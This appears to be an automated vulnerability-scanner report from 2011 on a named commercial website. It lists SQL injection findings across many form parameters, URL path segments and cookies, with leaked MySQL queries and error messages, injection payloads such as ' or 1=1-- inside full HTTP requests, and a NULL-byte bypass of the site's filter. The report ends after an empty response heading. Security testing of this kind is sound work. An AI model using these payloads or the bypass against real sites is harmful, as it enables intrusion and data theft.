The attributeId_457 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_457 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:41 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=11287b4l394htd5eb27a8jb4o7; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000'&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The button3 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the button3 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:59:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dk5eg05g24s0qmv09u8sg3qet2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subc' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:05:14 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=3mbv1dgupoaab830a3vh5cpup4; path=/ Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003'&iusrc=iups' at line 5
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:00:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=uu2ss4r791qve09per6vl34ng2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' at line 5
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:00:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=42a2ukst6dbut3523kd0o40fc2; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' at line 5
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:00:47 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=14qchkug8gj1e4lc8qu02mq3v6; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:05:29 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=6edb2o3uc0ha4adr4ds31dd6m6; path=/ Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc'/' union select prj.catId,p' at line 5
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:01:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=994e8c7d15alnciea466695650; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:01:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9n22gdv54tgseofd9ps6r0n9m5; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 16242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
1.299. http://www.insideup.com/ppc/leadflow/fist00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/fist00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:24:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=hb52heg70dp8nlovmccjjr4oq7; path=/ Content-Length: 2254 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... .group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1'=1' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc' at line 5
The phone parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the phone parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:01:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=uelg5ov2bh93d6cu2btl700hq5; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone'&subcategoryId=10003&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5
The subcategoryId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the subcategoryId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:02:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=r6o3crd1jmr760k374pgda2v60; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003'&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5
The website parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the website parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:03:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=u1vl5ojku6oidiuo4aup65apl4; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc=i' at line 5
The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 07:03:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=to37amisja3bdjrbubhjdlcq95; path=/ Content-Length: 6510 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... s&attributeId_457=2968__Less than $100,000&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=10003&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project.php?catId=10003&iusrc=iupsc&address=Address&attributeId_' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:40:55 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=v1tk2kfbmnu9eqkp9uo0egb747; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow'/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow'/fist0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:41:06 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2mffr079qd3ua8gek16ac6dl52; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/fist00'/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00'/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:41:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=0rjspfntfqaf0ldf2gc9spnei3; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/fist00/project_dynamic_page_updated.php'?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php'?catId=10003&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=10003&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2n457h402uriachthmsk4njo56; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/fist00/project_dynamic_page_updated.php?catId=10003'&group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003'&group=fist00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=fist00&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:44 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=80icemleaoecoib025acob9kb5; path=/ Content-Length: 2494 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... adflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00.'&template=3' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00.'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:40:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=8g2inhtg7i9kof989d0bodhs55; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1'=1' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:35:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=hc44mrg2025m2aprpls769aql3; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3'' OR prj.project_page_url = 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/fist00/project_dynamic_page_updated.php?catId=10003&group=fist00&templa' at line 5
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the JSESSIONID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069'; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:02:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 7230 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Finance&attrib' at line 5
The OAID cookie appears to be vulnerable to SQL injection attacks. The payload 59503172'%20or%201%3d1--%20 was submitted in the OAID cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee59503172'%20or%201%3d1--%20; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response
